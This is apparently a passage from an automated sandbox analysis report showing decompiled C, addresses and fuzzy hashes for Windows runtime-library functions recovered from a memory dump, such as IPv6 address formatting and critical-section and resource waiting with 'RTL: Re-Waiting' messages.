                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x025722b6
                                                0x00000000
                                                0x0257228f
                                                0x02572349
                                                0x0257234d
                                                0x02572251
                                                0x02572251
                                                0x00000000
                                                0x02572251
                                                0x025721a4
                                                0x025721a4
                                                0x025721a6
                                                0x025721a8
                                                0x025721ac
                                                0x025721b6
                                                0x025721b8
                                                0x025721bc
                                                0x025721be
                                                0x00000000
                                                0x00000000
                                                0x025721c0
                                                0x025721c2
                                                0x025721c4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x025721c4
                                                0x025721c6
                                                0x025721c6
                                                0x025721c8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x025721c8
                                                0x025721a2
                                                0x00000000
                                                0x02572183
                                                0x0255057b
                                                0x0255057d
                                                0x02550581
                                                0x02550583
                                                0x02572178
                                                0x00000000
                                                0x02550589
                                                0x0255058f
                                                0x0255058f
                                                0x02550583
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02572206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-4236105082
                                                • Opcode ID: af4af9e1bc2c2644f412290bb046c56a7201b6d3a5bd9db7cae22f2f179f6c1c
                                                • Instruction ID: eda0bd69ed15786afe4c938c65575c429e105952c11f934fcae7e0c502d2afa7
                                                • Opcode Fuzzy Hash: af4af9e1bc2c2644f412290bb046c56a7201b6d3a5bd9db7cae22f2f179f6c1c
                                                • Instruction Fuzzy Hash: A5514C717402126FEB14CE18DC80FA677AABFD4720F218259ED49DB2C5EA31EC418B9C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025514C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E025514C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x25f2088; // 0x76505f1a
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02547707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E025513CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02547707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02547707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02512340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0251E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                0x025514c0
                                                0x025514cb
                                                0x025514d2
                                                0x025514d6
                                                0x025514da
                                                0x025514de
                                                0x025514e3
                                                0x0255157a
                                                0x0255157a
                                                0x025514f1
                                                0x025514f3
                                                0x0257ea0f
                                                0x00000000
                                                0x0257ea15
                                                0x00000000
                                                0x0257ea15
                                                0x025514f9
                                                0x025514f9
                                                0x025514fe
                                                0x02551504
                                                0x0257ea1a
                                                0x0257ea1f
                                                0x0257ea21
                                                0x0257ea22
                                                0x0257ea27
                                                0x0257ea2a
                                                0x0257ea2a
                                                0x02551515
                                                0x02551517
                                                0x0255156d
                                                0x02551572
                                                0x02551575
                                                0x02551575
                                                0x0255151e
                                                0x0257ea50
                                                0x0257ea55
                                                0x0257ea58
                                                0x0257ea58
                                                0x0255152e
                                                0x02551531
                                                0x02551533
                                                0x00000000
                                                0x02551535
                                                0x02551541
                                                0x02551549
                                                0x02551549
                                                0x02551533
                                                0x025514f3
                                                0x02551559

                                                APIs
                                                • ___swprintf_l.LIBCMT ref: 0257EA22
                                                  • Part of subcall function 025513CB: ___swprintf_l.LIBCMT ref: 0255146B
                                                  • Part of subcall function 025513CB: ___swprintf_l.LIBCMT ref: 02551490
                                                • ___swprintf_l.LIBCMT ref: 0255156D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: 5b1b62256e480c2c7db7bdca9194cf4291a8927602e747d07e4e95a2d186f8b7
                                                • Instruction ID: 105d9aa03f87245ab0e8892fc956a019000c2707318366ac27a31d733239e887
                                                • Opcode Fuzzy Hash: 5b1b62256e480c2c7db7bdca9194cf4291a8927602e747d07e4e95a2d186f8b7
                                                • Instruction Fuzzy Hash: 8321E3729006299BDB20DE54CC51BEEBBBCBB50704F448452EC4AD3100EB70AE58CFE8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025353A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 44%
                                                			E025353A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x025f01c0;
									_push(_t92);
									_push(0);
									_t37 = E0250F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02554FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02563F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02563F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0259217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02563F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02553915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02535384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0250F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02553915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0250F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02553915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0250F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02553915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E02535329(_t74, _t92);
													_push(1);
													return E025353A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                                                0x025353ab
                                                0x025353ae
                                                0x025353b1
                                                0x025353b4
                                                0x025353b7
                                                0x025505b6
                                                0x025505c0
                                                0x025505c3
                                                0x00000000
                                                0x025505c9
                                                0x025505c9
                                                0x025505cc
                                                0x025505d5
                                                0x025505d5
                                                0x025353bd
                                                0x025353bd
                                                0x025353bd
                                                0x025353be
                                                0x025353be
                                                0x025353be
                                                0x025353c0
                                                0x00000000
                                                0x00000000
                                                0x02572269
                                                0x0257226d
                                                0x02572349
                                                0x0257234d
                                                0x02572273
                                                0x02572276
                                                0x02572279
                                                0x0257227e
                                                0x02572283
                                                0x02572287
                                                0x0257228a
                                                0x0257228d
                                                0x0257228f
                                                0x025722bc
                                                0x025722bc
                                                0x025722bc
                                                0x025722be
                                                0x025722c4
                                                0x025722cc
                                                0x025722d0
                                                0x025722d6
                                                0x025722d7
                                                0x025722da
                                                0x025722df
                                                0x025722e4
                                                0x00000000
                                                0x00000000
                                                0x025722e6
                                                0x025722e9
                                                0x025722f4
                                                0x025722f9
                                                0x025722fa
                                                0x02572305
                                                0x02572314
                                                0x02572319
                                                0x0257231a
                                                0x0257231d
                                                0x02572320
                                                0x02572323
                                                0x02572323
                                                0x02572328
                                                0x0257232d
                                                0x0257232f
                                                0x02572331
                                                0x02572336
                                                0x02572336
                                                0x0257233b
                                                0x0257233d
                                                0x02572350
                                                0x02572351
                                                0x02572356
                                                0x02572359
                                                0x02572359
                                                0x0257235b
                                                0x0257235d
                                                0x02535367
                                                0x0253536b
                                                0x02535372
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02572363
                                                0x02572363
                                                0x02572369
                                                0x0257236a
                                                0x0257236c
                                                0x02572371
                                                0x02572373
                                                0x00000000
                                                0x02572379
                                                0x02572379
                                                0x0257237a
                                                0x0257237f
                                                0x0257237f
                                                0x02572385
                                                0x02572386
                                                0x02572389
                                                0x0257238e
                                                0x02572390
                                                0x02535378
                                                0x0253537c
                                                0x02572396
                                                0x02572396
                                                0x02572397
                                                0x0257239c
                                                0x025723a2
                                                0x025723a3
                                                0x025723a6
                                                0x025723ab
                                                0x025723ad
                                                0x00000000
                                                0x025723b3
                                                0x025723b3
                                                0x025723b4
                                                0x025723b9
                                                0x025723ba
                                                0x025723ba
                                                0x025723bc
                                                0x025723bf
                                                0x00000000
                                                0x00000000
                                                0x02569153
                                                0x02569158
                                                0x0256915a
                                                0x0256915e
                                                0x02569160
                                                0x00000000
                                                0x02569166
                                                0x02569166
                                                0x02569171
                                                0x02569176
                                                0x02569176
                                                0x00000000
                                                0x02569160
                                                0x025723c6
                                                0x025723cb
                                                0x025723d7
                                                0x025723d7
                                                0x025723ad
                                                0x02572390
                                                0x02572373
                                                0x0257233f
                                                0x0257233f
                                                0x00000000
                                                0x0257233f
                                                0x02572291
                                                0x02572291
                                                0x02572293
                                                0x02572295
                                                0x0257229a
                                                0x025722a1
                                                0x025722a3
                                                0x025722a7
                                                0x025722a9
                                                0x00000000
                                                0x00000000
                                                0x025722ab
                                                0x025722ad
                                                0x025722af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x025722af
                                                0x025722b1
                                                0x025722b4
                                                0x025722b4
                                                0x025722b6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x025722b6
                                                0x0257228f
                                                0x00000000
                                                0x0257226d
                                                0x025353cb
                                                0x025353ce
                                                0x025353d0
                                                0x025353d4
                                                0x025353d6
                                                0x00000000
                                                0x025353d8
                                                0x025353e3
                                                0x025353ea
                                                0x025353ea
                                                0x025353d6
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025722F4
                                                Strings
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 025722FC
                                                • RTL: Re-Waiting, xrefs: 02572328
                                                • RTL: Resource at %p, xrefs: 0257230B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: 2c5d2349285a422199f6480d280fb8448a06db79adad6e7b3439b19561a74b43
                                                • Instruction ID: 2fa7b96e9702361ea16e6644d9a483250c22e397bc2ad2577310c6e07f8aef60
                                                • Opcode Fuzzy Hash: 2c5d2349285a422199f6480d280fb8448a06db79adad6e7b3439b19561a74b43
                                                • Instruction Fuzzy Hash: 5C5128716503166BEB119F28DC80FA677A9FF88324F105619FD09DB280FB71E8418B98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0253EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 51%
                                                			E0253EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0252DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x25f793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E025116C0(_t39);
				} else {
					_t40 = E0250F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02553915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E025101A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x25f793c; // 0x0
								_push(_t85);
								_t44 = E02511F28(_t71);
							} else {
								_t44 = E0250F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02553915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02592306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0253EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02554FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02563F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02563F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x25f20c0;
								if(_t85 != 0x25f20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0259217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02563F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                0x0253ec56
                                                0x0253ec56
                                                0x0253ec56
                                                0x0253ec5c
                                                0x0253ec64
                                                0x025723e6
                                                0x025723eb
                                                0x025723eb
                                                0x0253ec6a
                                                0x0253ec6c
                                                0x0253ec6f
                                                0x025723f3
                                                0x025723f8
                                                0x025723fa
                                                0x025723fc
                                                0x0253ec75
                                                0x0253ec76
                                                0x0253ec76
                                                0x0253ec7b
                                                0x0253ec7c
                                                0x0253ec7e
                                                0x02572406
                                                0x02572407
                                                0x0257240c
                                                0x0257240d
                                                0x0257240d
                                                0x0257240d
                                                0x02572414
                                                0x02572417
                                                0x0257241e
                                                0x02572435
                                                0x02572438
                                                0x0257243c
                                                0x0257243f
                                                0x02572442
                                                0x02572443
                                                0x02572446
                                                0x02572449
                                                0x02572453
                                                0x02572455
                                                0x0257245b
                                                0x0257245b
                                                0x0253eb99
                                                0x0253eb99
                                                0x0253eb9c
                                                0x0253eb9d
                                                0x0253eb9f
                                                0x0253eba2
                                                0x02572465
                                                0x0257246b
                                                0x0257246d
                                                0x0253eba8
                                                0x0253eba9
                                                0x0253eba9
                                                0x0253ebae
                                                0x0253ebb3
                                                0x0253ebb9
                                                0x0253ebbb
                                                0x02572513
                                                0x02572514
                                                0x02572519
                                                0x0257251b
                                                0x0253ec2a
                                                0x0253ec2d
                                                0x0253ec33
                                                0x0253ec36
                                                0x0253ec3a
                                                0x0253ec3e
                                                0x0253ec40
                                                0x0253ec47
                                                0x0253ec47
                                                0x0253ec40
                                                0x025122c6
                                                0x0253ebc1
                                                0x0253ebc1
                                                0x0253ebc5
                                                0x0253ec9a
                                                0x0253ec9a
                                                0x0253ebd6
                                                0x0253ebd6
                                                0x00000000
                                                0x0253ebbb
                                                0x02572477
                                                0x0257247c
                                                0x02572486
                                                0x0257248b
                                                0x02572496
                                                0x0257249b
                                                0x0257249d
                                                0x025724a0
                                                0x025724a3
                                                0x025724aa
                                                0x025724aa
                                                0x025724a5
                                                0x025724a5
                                                0x025724a5
                                                0x025724ac
                                                0x025724af
                                                0x025724b0
                                                0x025724b3
                                                0x025724b9
                                                0x025724ba
                                                0x025724bb
                                                0x025724c6
                                                0x025724cb
                                                0x025724cd
                                                0x025724d0
                                                0x025724d1
                                                0x025724d4
                                                0x025724d6
                                                0x025724d9
                                                0x025724d9
                                                0x025724dc
                                                0x025724df
                                                0x025724e1
                                                0x025724e7
                                                0x025724e9
                                                0x025724ec
                                                0x025724ef
                                                0x025724f2
                                                0x025724f2
                                                0x025724ef
                                                0x025724e7
                                                0x025724fa
                                                0x025724ff
                                                0x02572501
                                                0x02572503
                                                0x02572506
                                                0x0257250b
                                                0x0253eb8c
                                                0x0253eb93
                                                0x00000000
                                                0x00000000
                                                0x0253eb93
                                                0x00000000
                                                0x0253eb99
                                                0x0253ec85
                                                0x0253ec85
                                                0x0253ec85
                                                0x00000000

                                                Strings
                                                • RTL: Re-Waiting, xrefs: 025724FA
                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0257248D
                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 025724BD
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                • API String ID: 0-3177188983
                                                • Opcode ID: 151227c056d17b7ae220322a83ef86508b02f7b59dc6f30ed658ed17d456ba45
                                                • Instruction ID: e30f7f655876f79241006e7142eb2a828f4fb1a7c8cf599375675dab80898531
                                                • Opcode Fuzzy Hash: 151227c056d17b7ae220322a83ef86508b02f7b59dc6f30ed658ed17d456ba45
                                                • Instruction Fuzzy Hash: A941C7B0640205ABDB20DF64DC85FAA7BEAFF84720F108A55F955DB2C0D734E941CB69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0254FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0254FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0254EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
